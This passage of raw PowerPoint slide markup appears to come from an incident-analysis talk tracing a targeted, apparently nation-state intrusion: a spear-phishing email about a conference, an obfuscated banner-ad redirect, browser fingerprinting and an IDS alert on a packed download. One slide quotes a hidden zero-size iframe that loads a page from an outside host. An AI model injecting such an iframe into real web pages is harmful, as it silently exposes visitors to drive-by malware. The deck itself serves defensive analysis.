              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visualization and timeline of events </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Successful identification of nation-state operation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2B23B61D-7848-407F-A498-9F4C233B09A8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>45</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0671610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72" name="Rectangle 324"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="6248400"/>
            <a:ext cx="2209800" cy="45720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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2053" name="Object 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4689475" y="4824413"/>
          <a:ext cx="463550" cy="280987"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2122" name="Visio" r:id="rId4" imgW="2082800" imgH="1270000" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2054" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="3821113"/>
            <a:ext cx="762000" cy="469900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Signature IDS alerted on web download of UPX packed file </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2055" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4805363" y="3071813"/>
          <a:ext cx="300037" cy="346075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2123" name="Visio" r:id="rId5" imgW="1333500" imgH="1397000" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2057" name="AutoShape 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2054" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4921250" y="4291013"/>
            <a:ext cx="31750" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2058" name="AutoShape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2054" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4953000" y="3417888"/>
            <a:ext cx="3175" cy="403225"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 28"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2549525"/>
            <a:ext cx="914400" cy="346075"/>
            <a:chOff x="432" y="1776"/>
            <a:chExt cx="576" cy="218"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2065" name="Object 17"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="432" y="1776"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2124" name="Visio" r:id="rId6" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2066" name="Object 18"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="627" y="1776"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2125" name="Visio" r:id="rId7" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2067" name="Object 19"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="819" y="1776"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2126" name="Visio" r:id="rId8" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 25"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4419600"/>
            <a:ext cx="990600" cy="377825"/>
            <a:chOff x="432" y="2470"/>
            <a:chExt cx="624" cy="238"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2068" name="Object 20"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="432" y="2470"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2127" name="Visio" r:id="rId9" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2069" name="Object 21"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="627" y="2470"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2128" name="Visio" r:id="rId10" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="2070" name="Object 22"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="819" y="2470"/>
            <a:ext cx="189" cy="218"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <p:oleObj spid="_x0000_s2129" name="Visio" r:id="rId11" imgW="1333500" imgH="1397000" progId="">
                <p:embed/>
              </p:oleObj>
            </a:graphicData>
          </a:graphic>
        </p:graphicFrame>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2071" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="432" y="2592"/>
              <a:ext cx="624" cy="116"/>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Web Server farm at .mil</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2072" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3425825"/>
            <a:ext cx="1371600" cy="4603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Web search engine searches for documents regarding technology X and found a conference regarding the requested technology</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2074" name="AutoShape 26"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2072" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="3886200"/>
            <a:ext cx="3175" cy="533400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2075" name="AutoShape 27"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2072" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1143000" y="2895600"/>
            <a:ext cx="3175" cy="530225"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2077" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="4721225"/>
            <a:ext cx="1371600" cy="4603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Web document stating conference regarding technology X including date, location, key speakers and guests of honor.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2079" name="AutoShape 31"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2077" idx="1"/>
            <a:endCxn id="2071" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1676400" y="4705350"/>
            <a:ext cx="609600" cy="246063"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2080" name="AutoShape 32"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2077" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="4951413"/>
            <a:ext cx="1031875" cy="14287"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2081" name="Object 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="995363" y="5661025"/>
          <a:ext cx="300037" cy="346075"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2130" name="Visio" r:id="rId12" imgW="1333500" imgH="1397000" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2082" name="Text Box 34"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="5638800"/>
            <a:ext cx="1752600" cy="3683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Spam messages sent posing as conference material updates.  Email contains link to a web page about technology X.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2083" name="AutoShape 35"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2082" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="1295400" y="5822950"/>
            <a:ext cx="990600" cy="11113"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2085" name="AutoShape 37"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2082" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4038600" y="4965700"/>
            <a:ext cx="650875" cy="857250"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2086" name="Object 38"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8248650" y="4972050"/>
          <a:ext cx="514350" cy="342900"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2131" name="Visio" r:id="rId13" imgW="2286000" imgH="1371600" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2088" name="Text Box 40"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="6200775"/>
            <a:ext cx="1371600" cy="27622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User read email and clicked on link for update on technology X conference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2089" name="AutoShape 41"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2088" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5153025" y="4965700"/>
            <a:ext cx="1552575" cy="1373188"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2090" name="AutoShape 42"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2088" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="5314950"/>
            <a:ext cx="428625" cy="1023938"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2091" name="Text Box 43"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="3714750"/>
            <a:ext cx="1066800" cy="5524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Rotating banner add contains obfuscated JavaScript redirection to open new window located off the screen</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2092" name="AutoShape 44"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:endCxn id="2091" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="8458200" y="4267200"/>
            <a:ext cx="47625" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2093" name="Object 45"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4343400" y="1104900"/>
          <a:ext cx="361950" cy="342900"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2132" name="Visio" r:id="rId14" imgW="1587500" imgH="1371600" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2095" name="Object 47"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6607175" y="238125"/>
          <a:ext cx="403225" cy="371475"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2133" name="Visio" r:id="rId15" imgW="1765300" imgH="1498600" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2096" name="AutoShape 48"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2091" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8458200" y="2724150"/>
            <a:ext cx="28575" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2097" name="Object 49"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6324600" y="3276600"/>
          <a:ext cx="400050" cy="361950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2134" name="Visio" r:id="rId16" imgW="1752600" imgH="1473200" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2098" name="Object 50"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="7391400" y="3502025"/>
          <a:ext cx="304800" cy="384175"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s2135" name="Visio" r:id="rId17" imgW="1346200" imgH="1562100" progId="">
              <p:embed/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2099" name="Text Box 51"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="1993900"/>
            <a:ext cx="854075" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>Send OS and Web Browser detailed information</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2100" name="AutoShape 52"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2099" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7543800" y="2362200"/>
            <a:ext cx="46038" cy="1139825"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FF0101"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2103" name="Text Box 55"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="1981200"/>
            <a:ext cx="1295400" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600">
                <a:solidFill>
                  <a:srgbClr val="FF0101"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="-65" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe src=http://gallyz.com/xtzj.htm width=0 height=0&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="2104" name="AutoShape 56"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="2103" idx="2"/>
